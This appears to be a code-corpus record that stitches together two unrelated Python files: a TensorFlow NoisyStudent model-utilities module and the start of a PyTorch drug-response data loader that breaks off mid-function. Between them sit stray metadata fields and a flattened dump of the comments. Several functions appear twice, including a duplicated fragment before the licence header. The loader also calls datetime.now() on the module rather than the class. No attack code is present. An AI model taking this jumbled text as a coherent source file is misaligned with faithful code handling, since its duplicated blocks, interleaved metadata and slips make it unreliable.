class ImageCoder(object):
  '''Helper class that provides TensorFlow image coding utilities.'''

  def __init__(self):
    # Create a single Session to run all image coding calls.
    self._sess = tf.Session()

    # Initializes function that decodes RGB JPEG data.
    self._decode_jpeg_data = tf.placeholder(dtype=tf.string)
    self._decode_jpeg = tf.image.decode_jpeg(self._decode_jpeg_data, channels=3)

    # Encode graph: uint8 image -> max-quality JPEG bytes.
    self._encode_jpeg_data = tf.placeholder(dtype=tf.uint8)
    self._encode_jpeg = tf.image.encode_jpeg(
        self._encode_jpeg_data, format='rgb', quality=100)

  def encode_jpeg(self, image):
    # Runs the prebuilt encode graph; `image` is presumably an HWC uint8 RGB
    # array — TODO confirm against callers.
    image_data = self._sess.run(
        self._encode_jpeg, feed_dict={self._encode_jpeg_data: image})
    return image_data


def iterate_through_dataset(dst):
  # Generator that drains a tf.data.Dataset inside a throwaway Session,
  # yielding one element (as numpy) at a time until OutOfRangeError.
  iter = dst.make_initializable_iterator()
  elem = iter.get_next()
  cnt = 0
  with tf.Session() as sess:
    sess.run(iter.initializer)
    try:
      while True:
        features = sess.run(elem)
        yield features
    except tf.errors.OutOfRangeError:
      pass


def get_assignment_map_from_checkpoint(vars_list, init_checkpoint,
                                       only_teacher_model=False):
  # Builds the graph-variable -> checkpoint-name mapping consumed by
  # tf.train.init_from_checkpoint, preferring EMA shadow values when present.
  # Asserts if a requested variable is missing from the checkpoint.
  graph_to_ckpt_map = {}
  assignment_map = {}
  for var in vars_list:
    ori_name = var.name
    ckpt_name = ori_name[:-len(':0')]
    if 'global_step' in ori_name:
      continue
    if only_teacher_model:
      # only initialize the teacher model
      if 'teacher_model' not in ori_name:
        continue
      ckpt_name = ckpt_name[len('teacher_model/'):]
    if 'RMSProp' not in ckpt_name and 'ExponentialMovingAverage' not in ckpt_name:
      ckpt_name += '/ExponentialMovingAverage'
    graph_to_ckpt_map[ori_name] = ckpt_name
    assignment_map[ckpt_name] = var
  init_vars = tf.train.list_variables(init_checkpoint)
  initialized_variable = {}
  for x in init_vars:
    (name, var) = (x[0], x[1])
    if name not in assignment_map:
      continue
    initialized_variable[name] = True
  new_assignment_map = {}
  for ckpt_name in assignment_map:
    if ckpt_name not in initialized_variable:
      block_name = ckpt_name.split('/')[1]
      assert False, ckpt_name + ' not found'
    else:
      new_assignment_map[ckpt_name] = assignment_map[ckpt_name]
  return new_assignment_map, graph_to_ckpt_map


def construct_scalar_host_call(
    metric_dict,
):
  # Packs scalar metrics into the (fn, tensors) pair expected by
  # TPUEstimatorSpec.host_call so they get written as TF2 summaries.
  metric_names = list(metric_dict.keys())

  def host_call_fn(gs, *args):
    gs = gs[0]
    # Host call fns are executed FLAGS.iterations_per_loop times after one
    # TPU loop is finished, setting max_queue value to the same as number of
    # iterations will make the summary writer only flush the data to storage
    # once per loop.
    with tf2.summary.create_file_writer(
        FLAGS.model_dir, max_queue=FLAGS.iterations_per_loop).as_default():
      with tf2.summary.record_if(
          tf.math.equal(tf.math.floormod(gs, FLAGS.iterations_per_loop), 0)):
        for i, name in enumerate(metric_names):
          scalar = args[i][0]
          # with tf.contrib.summary.record_summaries_every_n_global_steps(100, gs):
          tf2.summary.scalar(name, scalar, step=gs)
        return tf.summary.all_v2_summary_ops()

  global_step_tensor = tf.reshape(tf.train.get_or_create_global_step(), [1])
  other_tensors = [tf.reshape(metric_dict[key], [1]) for key in metric_names]
  host_call = (host_call_fn, [global_step_tensor] + other_tensors)
  return host_call


def get_all_variable():
  # Trainable variables plus batch-norm moving statistics, deduplicated and
  # sorted by name for deterministic ordering.
  var_list = tf.trainable_variables() + tf.get_collection('moving_vars')
  for v in tf.global_variables():
    # We maintain mva for batch norm moving mean and variance as well.
    if 'moving_mean' in v.name or 'moving_variance' in v.name:
      var_list.append(v)
  var_list = list(set(var_list))
  var_list = sorted(var_list, key=lambda var: var.name)
  return var_list


def init_from_ckpt(scaffold_fn):
  # Initializes all model variables from either the teacher checkpoint
  # (FLAGS.teacher_model_path) or FLAGS.init_model_path, and returns the
  # (possibly replaced) scaffold_fn for TPU use.
  all_var_list = get_all_variable()
  all_var_list = sorted(all_var_list, key=lambda var: var.name)
  if FLAGS.teacher_model_name:
    init_ckpt = FLAGS.teacher_model_path
  else:
    init_ckpt = FLAGS.init_model_path
  assignment_map, graph_to_ckpt_map = get_assignment_map_from_checkpoint(
      all_var_list, init_ckpt, FLAGS.teacher_model_name is not None)
  if FLAGS.use_tpu:

    def tpu_scaffold():
      tf.logging.info('initializing from {}'.format(init_ckpt))
      tf.train.init_from_checkpoint(init_ckpt, assignment_map)
      return tf.train.Scaffold()

    scaffold_fn = tpu_scaffold
  else:
    tf.train.init_from_checkpoint(init_ckpt, assignment_map)
  tf.logging.info('**** Variables ****')
  for var in all_var_list:
    init_string = ''
    if var.name in graph_to_ckpt_map:
      init_string = ', *INIT_FROM_CKPT* <== {}'.format(
          graph_to_ckpt_map[var.name])
    tf.logging.info('  name = %s, shape = %s%s', var.name, var.shape,
                    init_string)
  return scaffold_fn
# coding=utf-8
# Copyright 2019 The Google NoisyStudent Team Authors.
#
# Licensed under the Apache License, Version 2.0 (the 'License');
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an 'AS IS' BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
'''Model utilities.

Helpers shared by the NoisyStudent training code: learning-rate schedules,
optimizers, a cross-replica TPU batch norm, checkpoint archiving/restoring,
tf.Example feature builders and TPU host-call summary plumbing. Written
against the TF1 graph-mode API.
'''
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function

import six
import json
import re
from absl import flags
from PIL import Image
import collections
import os
import functools
import numpy as np
import tensorflow as tf
import tensorflow.compat.v2 as tf2
from tensorflow.python.tpu import tpu_function

FLAGS = flags.FLAGS


def build_learning_rate(
    initial_lr,
    global_step,
    steps_per_epoch=None,
    lr_decay_type='exponential',
    decay_factor=0.97,
    decay_epochs=2.4,
    total_steps=None,
    warmup_epochs=5,
    start_from_step=0,
):
  '''Build learning rate.

  Supports 'exponential' (needs steps_per_epoch), 'cosine' (needs
  total_steps) and 'constant' schedules, with optional linear warmup over
  the first `warmup_epochs` epochs. `start_from_step` offsets the global
  step, e.g. when resuming a schedule.
  '''
  lr_step = global_step + start_from_step
  if lr_decay_type == 'exponential':
    assert steps_per_epoch is not None
    decay_steps = steps_per_epoch * decay_epochs
    lr = tf.train.exponential_decay(
        initial_lr, lr_step, decay_steps, decay_factor, staircase=True)
  elif lr_decay_type == 'cosine':
    assert total_steps is not None
    lr = 0.5 * initial_lr * (
        1 + tf.cos(np.pi * tf.cast(lr_step, tf.float32) / total_steps))
  elif lr_decay_type == 'constant':
    lr = initial_lr
  else:
    assert False, 'Unknown lr_decay_type : %s' % lr_decay_type
  if warmup_epochs:
    tf.logging.info('Learning rate warmup_epochs: %d' % warmup_epochs)
    warmup_steps = int(warmup_epochs * steps_per_epoch)
    # Linear ramp from 0 to initial_lr over the warmup window.
    warmup_lr = (
        initial_lr * tf.cast(lr_step, tf.float32) / tf.cast(
            warmup_steps, tf.float32))
    lr = tf.cond(lr_step < warmup_steps, lambda: warmup_lr, lambda: lr)
  return lr


def build_optimizer(learning_rate,
                    optimizer_name='rmsprop',
                    decay=0.9,
                    epsilon=0.001,
                    momentum=0.9):
  '''Build optimizer.

  Returns a tf.train optimizer for 'sgd', 'momentum' or 'rmsprop';
  logs a fatal error on any other name.
  '''
  if optimizer_name == 'sgd':
    tf.logging.info('Using SGD optimizer')
    optimizer = tf.train.GradientDescentOptimizer(learning_rate=learning_rate)
  elif optimizer_name == 'momentum':
    tf.logging.info('Using Momentum optimizer')
    optimizer = tf.train.MomentumOptimizer(
        learning_rate=learning_rate, momentum=momentum)
  elif optimizer_name == 'rmsprop':
    tf.logging.info('Using RMSProp optimizer')
    optimizer = tf.train.RMSPropOptimizer(learning_rate, decay, momentum,
                                          epsilon)
  else:
    tf.logging.fatal('Unknown optimizer:', optimizer_name)
  return optimizer


class TpuBatchNormalization(tf.layers.BatchNormalization):
  # class TpuBatchNormalization(tf.layers.BatchNormalization):
  '''Cross replica batch normalization.

  Averages batch statistics across groups of TPU replicas so that the
  effective batch size for normalization spans multiple cores.
  '''

  def __init__(self, fused=False, **kwargs):
    # The fused kernel computes statistics per core only, which defeats the
    # purpose of this class.
    if fused in (True, None):
      raise ValueError('TpuBatchNormalization does not support fused=True.')
    super(TpuBatchNormalization, self).__init__(fused=fused, **kwargs)

  def _cross_replica_average(self, t, num_shards_per_group):
    '''Calculates the average value of input tensor across TPU replicas.'''
    num_shards = tpu_function.get_tpu_context().number_of_shards
    group_assignment = None
    if num_shards_per_group > 1:
      if num_shards % num_shards_per_group != 0:
        raise ValueError('num_shards: %d mod shards_per_group: %d, should be 0'
                         % (num_shards, num_shards_per_group))
      num_groups = num_shards // num_shards_per_group
      # Partition replica ids into contiguous groups of num_shards_per_group.
      group_assignment = [[
          x for x in range(num_shards) if x // num_shards_per_group == y
      ] for y in range(num_groups)]
      return tf.tpu.cross_replica_sum(t, group_assignment) / tf.cast(
          num_shards_per_group, t.dtype)
    else:
      # group_assignment=None sums across all replicas.
      tf.logging.info('TpuBatchNormalization None')
      return tf.tpu.cross_replica_sum(t, group_assignment) / tf.cast(
          num_shards, t.dtype)

  def _moments(self, inputs, reduction_axes, keep_dims):
    '''Compute the mean and variance: it overrides the original _moments.'''
    # Per-shard (per-core) statistics from the stock BatchNormalization.
    shard_mean, shard_variance = super(TpuBatchNormalization, self)._moments(
        inputs, reduction_axes, keep_dims=keep_dims)

    num_shards = tpu_function.get_tpu_context().number_of_shards or 1
    # Flag value -1 means "auto-select the cross-replica group size".
    if FLAGS.num_shards_per_group != -1:
      num_shards_per_group = FLAGS.num_shards_per_group
    else:
      if num_shards <= 8:  # Skip cross_replica for 2x2 or smaller slices.
        num_shards_per_group = 1
      else:
        num_shards_per_group = max(8, num_shards // 8)
    tf.logging.info('TpuBatchNormalization with num_shards_per_group %s',
                    num_shards_per_group)
    if num_shards_per_group > 1 or num_shards_per_group == -2:
      # Compute variance using: Var[X]= E[X^2] - E[X]^2.
      shard_square_of_mean = tf.math.square(shard_mean)
      shard_mean_of_square = shard_variance + shard_square_of_mean
      group_mean = self._cross_replica_average(
          shard_mean, num_shards_per_group)
      group_mean_of_square = self._cross_replica_average(
          shard_mean_of_square, num_shards_per_group)
      group_variance = group_mean_of_square - tf.math.square(group_mean)
      return (group_mean, group_variance)
    else:
      return (shard_mean, shard_variance)


def stochastic_depth(inputs, is_training, stochastic_depth_rate):
  '''Apply stochastic depth.

  At training time the whole input is randomly zeroed per example with
  probability `stochastic_depth_rate` and kept activations are rescaled by
  1/keep_prob; at eval time this is the identity.
  '''
  if not is_training:
    return inputs

  # Compute keep_prob
  # TODO(tanmingxing): add support for training progress.
  keep_prob = 1.0 - stochastic_depth_rate

  # Compute stochastic_depth tensor
  batch_size = tf.shape(inputs)[0]
  random_tensor = keep_prob
  random_tensor += tf.random_uniform([batch_size, 1, 1, 1], dtype=inputs.dtype)
  # floor() of a value in [keep_prob, 1 + keep_prob) yields a per-example
  # Bernoulli(keep_prob) 0/1 mask.
  binary_tensor = tf.floor(random_tensor)
  output = tf.div(inputs, keep_prob) * binary_tensor
  return output


def archive_ckpt(ckpt_eval, ckpt_objective, ckpt_path):
  '''Archive a checkpoint if the metric is better.

  Returns True when the checkpoint was archived, False when the previously
  saved objective is better or no checkpoint files were found.
  '''
  ckpt_dir, ckpt_name = os.path.split(ckpt_path)
  saved_objective_path = os.path.join(ckpt_dir, 'best_objective.txt')
  saved_objective = float('-inf')
  if tf.gfile.Exists(saved_objective_path):
    with tf.gfile.GFile(saved_objective_path, 'r') as f:
      saved_objective = float(f.read())
  if saved_objective > ckpt_objective:
    tf.logging.info('Ckpt %s is worse than %s', ckpt_objective, saved_objective)
    return False

  filenames = tf.gfile.Glob(ckpt_path + '.*')
  if filenames is None:
    tf.logging.info('No files to copy for checkpoint %s', ckpt_path)
    return False

  # Clear the old folder.
  dst_dir = os.path.join(ckpt_dir, 'archive')
  if tf.gfile.Exists(dst_dir):
    tf.gfile.DeleteRecursively(dst_dir)
  tf.gfile.MakeDirs(dst_dir)

  # Write checkpoints.
  for f in filenames:
    dest = os.path.join(dst_dir, os.path.basename(f))
    tf.gfile.Copy(f, dest, overwrite=True)
  ckpt_state = tf.train.generate_checkpoint_state_proto(
      dst_dir,
      model_checkpoint_path=ckpt_name,
      all_model_checkpoint_paths=[ckpt_name])
  with tf.gfile.GFile(os.path.join(dst_dir, 'checkpoint'), 'w') as f:
    f.write(str(ckpt_state))
  with tf.gfile.GFile(os.path.join(dst_dir, 'best_eval.txt'), 'w') as f:
    f.write('%s' % ckpt_eval)

  # Update the best objective.
  with tf.gfile.GFile(saved_objective_path, 'w') as f:
    f.write('%f' % ckpt_objective)

  tf.logging.info('Copying checkpoint %s to %s', ckpt_path, dst_dir)
  return True


# TODO(hongkuny): Consolidate this as a common library cross models.
class DepthwiseConv2D(tf.keras.layers.DepthwiseConv2D, tf.layers.Layer):
  '''Wrap keras DepthwiseConv2D to tf.layers.'''

  pass


def save_pic(uint8_arr, filename, log=True):
  # Saves a uint8 image array as a max-quality JPEG through tf.gfile
  # (so GCS paths work as well as local ones).
  if log:
    tf.logging.info('saving {}'.format(filename))
  img = Image.fromarray(uint8_arr)
  with tf.gfile.Open(filename, 'wb') as ouf:
    img.save(ouf, subsampling=0, quality=100)


def int64_feature(value):
  '''Wrapper for inserting int64 features into Example proto.'''
  if not isinstance(value, list):
    value = [value]
  return tf.train.Feature(int64_list=tf.train.Int64List(value=value))


def float_feature(value):
  '''Wrapper for inserting float features into Example proto.'''
  if not isinstance(value, list):
    value = [value]
  return tf.train.Feature(float_list=tf.train.FloatList(value=value))


def bytes_feature(value):
  '''Wrapper for inserting bytes features into Example proto.'''
  if six.PY3 and isinstance(value, six.text_type):
    value = six.binary_type(value, encoding='utf-8')
  return tf.train.Feature(bytes_list=tf.train.BytesList(value=[value]))


class ImageCoder(object):
  '''Helper class that provides TensorFlow image coding utilities.'''

  def __init__(self):
    # Create a single Session to run all image coding calls.
    self._sess = tf.Session()

    # Initializes function that decodes RGB JPEG data.
    self._decode_jpeg_data = tf.placeholder(dtype=tf.string)
    self._decode_jpeg = tf.image.decode_jpeg(self._decode_jpeg_data, channels=3)

    # Encode graph: uint8 image -> max-quality JPEG bytes.
    self._encode_jpeg_data = tf.placeholder(dtype=tf.uint8)
    self._encode_jpeg = tf.image.encode_jpeg(
        self._encode_jpeg_data, format='rgb', quality=100)

  def encode_jpeg(self, image):
    # Runs the prebuilt encode graph; `image` is presumably an HWC uint8 RGB
    # array — TODO confirm against callers.
    image_data = self._sess.run(
        self._encode_jpeg, feed_dict={self._encode_jpeg_data: image})
    return image_data


def iterate_through_dataset(dst):
  # Generator that drains a tf.data.Dataset inside a throwaway Session,
  # yielding one element (as numpy) at a time until OutOfRangeError.
  iter = dst.make_initializable_iterator()
  elem = iter.get_next()
  cnt = 0
  with tf.Session() as sess:
    sess.run(iter.initializer)
    try:
      while True:
        features = sess.run(elem)
        yield features
    except tf.errors.OutOfRangeError:
      pass


def get_assignment_map_from_checkpoint(vars_list, init_checkpoint,
                                       only_teacher_model=False):
  # Builds the graph-variable -> checkpoint-name mapping consumed by
  # tf.train.init_from_checkpoint, preferring EMA shadow values when present.
  # Asserts if a requested variable is missing from the checkpoint.
  graph_to_ckpt_map = {}
  assignment_map = {}
  for var in vars_list:
    ori_name = var.name
    ckpt_name = ori_name[:-len(':0')]
    if 'global_step' in ori_name:
      continue
    if only_teacher_model:
      # only initialize the teacher model
      if 'teacher_model' not in ori_name:
        continue
      ckpt_name = ckpt_name[len('teacher_model/'):]
    if 'RMSProp' not in ckpt_name and 'ExponentialMovingAverage' not in ckpt_name:
      ckpt_name += '/ExponentialMovingAverage'
    graph_to_ckpt_map[ori_name] = ckpt_name
    assignment_map[ckpt_name] = var
  init_vars = tf.train.list_variables(init_checkpoint)
  initialized_variable = {}
  for x in init_vars:
    (name, var) = (x[0], x[1])
    if name not in assignment_map:
      continue
    initialized_variable[name] = True
  new_assignment_map = {}
  for ckpt_name in assignment_map:
    if ckpt_name not in initialized_variable:
      block_name = ckpt_name.split('/')[1]
      assert False, ckpt_name + ' not found'
    else:
      new_assignment_map[ckpt_name] = assignment_map[ckpt_name]
  return new_assignment_map, graph_to_ckpt_map


def construct_scalar_host_call(
    metric_dict,
):
  # Packs scalar metrics into the (fn, tensors) pair expected by
  # TPUEstimatorSpec.host_call so they get written as TF2 summaries.
  metric_names = list(metric_dict.keys())

  def host_call_fn(gs, *args):
    gs = gs[0]
    # Host call fns are executed FLAGS.iterations_per_loop times after one
    # TPU loop is finished, setting max_queue value to the same as number of
    # iterations will make the summary writer only flush the data to storage
    # once per loop.
    with tf2.summary.create_file_writer(
        FLAGS.model_dir, max_queue=FLAGS.iterations_per_loop).as_default():
      with tf2.summary.record_if(
          tf.math.equal(tf.math.floormod(gs, FLAGS.iterations_per_loop), 0)):
        for i, name in enumerate(metric_names):
          scalar = args[i][0]
          # with tf.contrib.summary.record_summaries_every_n_global_steps(100, gs):
          tf2.summary.scalar(name, scalar, step=gs)
        return tf.summary.all_v2_summary_ops()

  global_step_tensor = tf.reshape(tf.train.get_or_create_global_step(), [1])
  other_tensors = [tf.reshape(metric_dict[key], [1]) for key in metric_names]
  host_call = (host_call_fn, [global_step_tensor] + other_tensors)
  return host_call


def get_all_variable():
  # Trainable variables plus batch-norm moving statistics, deduplicated and
  # sorted by name for deterministic ordering.
  var_list = tf.trainable_variables() + tf.get_collection('moving_vars')
  for v in tf.global_variables():
    # We maintain mva for batch norm moving mean and variance as well.
    if 'moving_mean' in v.name or 'moving_variance' in v.name:
      var_list.append(v)
  var_list = list(set(var_list))
  var_list = sorted(var_list, key=lambda var: var.name)
  return var_list


def init_from_ckpt(scaffold_fn):
  # Initializes all model variables from either the teacher checkpoint
  # (FLAGS.teacher_model_path) or FLAGS.init_model_path, and returns the
  # (possibly replaced) scaffold_fn for TPU use.
  all_var_list = get_all_variable()
  all_var_list = sorted(all_var_list, key=lambda var: var.name)
  if FLAGS.teacher_model_name:
    init_ckpt = FLAGS.teacher_model_path
  else:
    init_ckpt = FLAGS.init_model_path
  assignment_map, graph_to_ckpt_map = get_assignment_map_from_checkpoint(
      all_var_list, init_ckpt, FLAGS.teacher_model_name is not None)
  if FLAGS.use_tpu:

    def tpu_scaffold():
      tf.logging.info('initializing from {}'.format(init_ckpt))
      tf.train.init_from_checkpoint(init_ckpt, assignment_map)
      return tf.train.Scaffold()

    scaffold_fn = tpu_scaffold
  else:
    tf.train.init_from_checkpoint(init_ckpt, assignment_map)
  tf.logging.info('**** Variables ****')
  for var in all_var_list:
    init_string = ''
    if var.name in graph_to_ckpt_map:
      init_string = ', *INIT_FROM_CKPT* <== {}'.format(
          graph_to_ckpt_map[var.name])
    tf.logging.info('  name = %s, shape = %s%s', var.name, var.shape,
                    init_string)
  return scaffold_fn
en
0.805988
# coding=utf-8 # Copyright 2019 The Google NoisyStudent Team Authors. # # Licensed under the Apache License, Version 2.0 (the 'License'); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an 'AS IS' BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. Model utilities. Build learning rate. Build optimizer. # class TpuBatchNormalization(tf.layers.BatchNormalization): Cross replica batch normalization. Calculates the average value of input tensor across TPU replicas. Compute the mean and variance: it overrides the original _moments. # Skip cross_replica for 2x2 or smaller slices. # Compute variance using: Var[X]= E[X^2] - E[X]^2. Apply stochastic depth. # Compute keep_prob # TODO(tanmingxing): add support for training progress. # Compute stochastic_depth tensor Archive a checkpoint if the metric is better. # Clear the old folder. # Write checkpoints. # Update the best objective. # TODO(hongkuny): Consolidate this as a common library cross models. Wrap keras DepthwiseConv2D to tf.layers. Wrapper for inserting int64 features into Example proto. Wrapper for inserting float features into Example proto. Wrapper for inserting bytes features into Example proto. Helper class that provides TensorFlow image coding utilities. # Create a single Session to run all image coding calls. # Initializes function that decodes RGB JPEG data. # only initialize the teacher model # Host call fns are executed FLAGS.iterations_per_loop times after one # TPU loop is finished, setting max_queue value to the same as number of # iterations will make the summary writer only flush the data to storage # once per loop. 
# with tf.contrib.summary.record_summaries_every_n_global_steps(100, gs): # We maintain mva for batch norm moving mean and variance as well.
2.098331
2
data.py
XieResearchGroup/CLEIT
0
6628979
<filename>data.py import os import datetime import numpy as np import random import pandas as pd import data_config import torch from torch.utils.data import TensorDataset, DataLoader from sklearn.model_selection import train_test_split, StratifiedKFold _RNG_SEED = None DRUG_DICT = { 'gem': 'gemcitabine', 'ava': 'avagacestat', } def get_rng(obj=None): """ This function is copied from `tensorpack <https://github.com/ppwwyyxx/tensorpack/blob/master/tensorpack/utils/utils.py>`__. Get a good RNG seeded with time, pid and the object. Args: obj: some object to use to generate random seed. Returns: np.random.RandomState: the RNG. """ seed = (id(obj) + os.getpid() + int(datetime.now().strftime("%Y%m%d%H%M%S%f"))) % 4294967295 if _RNG_SEED is not None: seed = _RNG_SEED return random.Random(seed) class DataProvider: def __init__(self, batch_size=64, target='AUC', random_seed=2019): self.seed = random_seed self.target = target self.batch_size = batch_size self._load_gex_data() self._load_mut_data() self._load_target_data() self.shape_dict = {'gex': self.gex_dat.shape[-1], 'mut': self.mut_dat.shape[-1], 'target': self.target_df.shape[-1]} def _load_gex_data(self): self.gex_dat = pd.read_csv(data_config.gex_feature_file, index_col=0) # ccle_sample_info_df = pd.read_csv(data_config.ccle_sample_file, index_col=0) # with gzip.open(data_config.xena_sample_file) as f: # xena_sample_info_df = pd.read_csv(f, sep='\t', index_col=0) # xena_samples = xena_sample_info_df.index.intersection(self.gex_dat.index) # ccle_samples = self.gex_dat.index.difference(xena_samples) # xena_sample_info_df = xena_sample_info_df.loc[xena_samples] # ccle_sample_info_df = ccle_sample_info_df.loc[ccle_samples.intersection(ccle_sample_info_df.index)] # self.xena_gex_df = self.gex_dat.loc[xena_samples] # self.mut_gex_df = self.gex_dat.loc[ccle_samples] def _load_mut_data(self): self.xena_mut_dat = pd.read_csv(data_config.xena_mut_uq_file, index_col=0) self.ccle_mut_dat = 
pd.read_csv(data_config.ccle_mut_uq_file, index_col=0) self.mut_dat = self.xena_mut_dat.append(self.ccle_mut_dat) def _load_target_data(self): # gdsc1_response = pd.read_csv(data_config.gdsc_target_file1) # gdsc2_response = pd.read_csv(data_config.gdsc_target_file2) # gdsc1_sensitivity_df = gdsc1_response[['COSMIC_ID', 'DRUG_NAME', self.target]] # gdsc2_sensitivity_df = gdsc2_response[['COSMIC_ID', 'DRUG_NAME', self.target]] # gdsc1_sensitivity_df.loc[:, 'DRUG_NAME'] = gdsc1_sensitivity_df['DRUG_NAME'].str.lower() # gdsc2_sensitivity_df.loc[:, 'DRUG_NAME'] = gdsc2_sensitivity_df['DRUG_NAME'].str.lower() # # if self.target == 'LN_IC50': # gdsc1_sensitivity_df.loc[:, self.target] = np.exp(gdsc1_sensitivity_df[self.target]) # gdsc2_sensitivity_df.loc[:, self.target] = np.exp(gdsc2_sensitivity_df[self.target]) # # gdsc1_target_df = gdsc1_sensitivity_df.groupby(['COSMIC_ID', 'DRUG_NAME']).mean() # gdsc2_target_df = gdsc2_sensitivity_df.groupby(['COSMIC_ID', 'DRUG_NAME']).mean() # gdsc1_target_df = gdsc1_target_df.loc[gdsc1_target_df.index.difference(gdsc2_target_df.index)] # gdsc_target_df = pd.concat([gdsc1_target_df, gdsc2_target_df]) target = self.target.lower() gdsc_target_df = pd.read_csv(data_config.gdsc_target_file) gdsc_target_df = gdsc_target_df[['COSMIC_ID', 'DRUG_NAME', target]] gdsc_target_df.dropna(subset=[target], inplace=True) gdsc_target_df = gdsc_target_df.groupby(['COSMIC_ID', 'DRUG_NAME']).mean() target_df = gdsc_target_df.reset_index().pivot_table(values=target, index='COSMIC_ID', columns='DRUG_NAME') ccle_sample_info = pd.read_csv(data_config.ccle_sample_file, index_col=4) ccle_sample_info = ccle_sample_info.loc[ccle_sample_info.index.dropna()] ccle_sample_info.index = ccle_sample_info.index.astype('int') gdsc_sample_info = pd.read_csv(data_config.gdsc_sample_file, header=0, index_col=1) gdsc_sample_info = gdsc_sample_info.loc[gdsc_sample_info.index.dropna()] gdsc_sample_info.index = gdsc_sample_info.index.astype('int') gdsc_sample_mapping = 
gdsc_sample_info.merge(ccle_sample_info, left_index=True, right_index=True, how='inner')[ ['DepMap_ID']] gdsc_sample_mapping_dict = gdsc_sample_mapping.to_dict()['DepMap_ID'] target_df.index = target_df.index.map(gdsc_sample_mapping_dict) target_df = target_df.loc[target_df.index.dropna()] gex_labeled_samples = self.gex_dat.index.intersection(target_df.index) target_df.drop(columns=target_df.columns[ target_df.loc[gex_labeled_samples].isna().sum() / len(gex_labeled_samples) >= 0.1], inplace=True) self.target_df = target_df def get_unlabeled_gex_dataloader(self): gex_dataset = TensorDataset(torch.from_numpy(self.gex_dat.values.astype('float32'))) unlabeled_gex_dataloader = DataLoader(gex_dataset, batch_size=self.batch_size, shuffle=True) return unlabeled_gex_dataloader def get_labeled_data_generator(self, omics='mut'): labeled_samples = self.gex_dat.index.intersection(self.target_df.index) labeled_samples = self.ccle_mut_dat.index.intersection(labeled_samples) labeled_target_df = self.target_df.loc[labeled_samples] labeled_samples = labeled_samples[labeled_target_df.shape[1] - labeled_target_df.isna().sum(axis=1) >= 2] labeled_target_df = self.target_df.loc[labeled_samples] mut_only_labeled_samples = self.mut_dat.index.intersection(self.target_df.index) mut_only_labeled_samples = mut_only_labeled_samples.difference(labeled_samples) mut_only_labeled_target_df = self.target_df.loc[mut_only_labeled_samples] mut_only_labeled_samples = mut_only_labeled_samples[ mut_only_labeled_target_df.shape[1] - mut_only_labeled_target_df.isna().sum(axis=1) >= 2] mut_only_labeled_target_df = self.target_df.loc[mut_only_labeled_samples] labeled_drug_mut_only_dataset = TensorDataset( torch.from_numpy(self.ccle_mut_dat.loc[mut_only_labeled_samples].values.astype('float32')), torch.from_numpy(mut_only_labeled_target_df.values.astype('float32')) ) labeled_drug_mut_only_dataloader = DataLoader(labeled_drug_mut_only_dataset, batch_size=self.batch_size, shuffle=True) sample_label_vec = ( 
labeled_target_df.isna().sum(axis=1) <= labeled_target_df.isna().sum(axis=1).median()).astype('int') s_kfold = StratifiedKFold(n_splits=5, random_state=self.seed, shuffle=True) if omics == 'gex': for train_index, test_index in s_kfold.split(self.gex_dat.loc[labeled_samples].values, sample_label_vec): train_labeled_df, test_labeled_df = self.gex_dat.loc[labeled_samples].values[train_index], \ self.gex_dat.loc[labeled_samples].values[test_index] train_labels, test_labels = labeled_target_df.values[train_index].astype('float32'), \ labeled_target_df.values[ test_index].astype('float32') train_labeled_dateset = TensorDataset( torch.from_numpy(train_labeled_df.astype('float32')), torch.from_numpy(train_labels)) test_labeled_dateset = TensorDataset( torch.from_numpy(test_labeled_df.astype('float32')), torch.from_numpy(test_labels)) train_labeled_dataloader = DataLoader(train_labeled_dateset, batch_size=self.batch_size, shuffle=True, drop_last=True) test_labeled_dataloader = DataLoader(test_labeled_dateset, batch_size=self.batch_size, shuffle=True) yield train_labeled_dataloader, test_labeled_dataloader else: for train_index, test_index in s_kfold.split(self.ccle_mut_dat.loc[labeled_samples].values, sample_label_vec): train_labeled_df, test_labeled_df = self.ccle_mut_dat.loc[labeled_samples].values[train_index], \ self.ccle_mut_dat.loc[labeled_samples].values[test_index] train_labels, test_labels = labeled_target_df.values[train_index].astype('float32'), \ labeled_target_df.values[ test_index].astype('float32') train_labeled_dateset = TensorDataset( torch.from_numpy(train_labeled_df.astype('float32')), torch.from_numpy(train_labels)) test_labeled_dateset = TensorDataset( torch.from_numpy(test_labeled_df.astype('float32')), torch.from_numpy(test_labels)) train_labeled_dataloader = DataLoader(train_labeled_dateset, batch_size=self.batch_size, shuffle=True, drop_last=True) test_labeled_dataloader = DataLoader(test_labeled_dateset, batch_size=self.batch_size, shuffle=True) 
yield train_labeled_dataloader, test_labeled_dataloader, labeled_drug_mut_only_dataloader def get_labeled_gex_dataloader(self): gex_labeled_samples = self.gex_dat.index.intersection(self.target_df.index) gex_target_df = self.target_df.loc[gex_labeled_samples] gex_labeled_samples = gex_labeled_samples[gex_target_df.shape[1] - gex_target_df.isna().sum(axis=1) >= 2] gex_target_df = self.target_df.loc[gex_labeled_samples] labeled_gex_dataset = TensorDataset( torch.from_numpy(self.gex_dat.loc[gex_labeled_samples].values.astype('float32')), torch.from_numpy(gex_target_df.values.astype('float32')) ) labeled_gex_dataloader = DataLoader(labeled_gex_dataset, batch_size=self.batch_size, shuffle=True, drop_last=True) return labeled_gex_dataloader def get_labeled_mut_dataloader(self): gex_labeled_samples = self.gex_dat.index.intersection(self.target_df.index) mut_labeled_samples = self.ccle_mut_dat.index.intersection(self.target_df.index) mut_only_labeled_samples = mut_labeled_samples.difference(gex_labeled_samples) mut_labeled_samples = mut_labeled_samples.difference(mut_only_labeled_samples) mut_target_df = self.target_df.loc[mut_labeled_samples] mut_labeled_samples = mut_labeled_samples[mut_target_df.shape[1] - mut_target_df.isna().sum(axis=1) >= 2] mut_target_df = self.target_df.loc[mut_labeled_samples] mut_only_target_df = self.target_df.loc[mut_only_labeled_samples] mut_only_labeled_samples = mut_only_labeled_samples[ mut_only_target_df.shape[1] - mut_only_target_df.isna().sum(axis=1) >= 2] 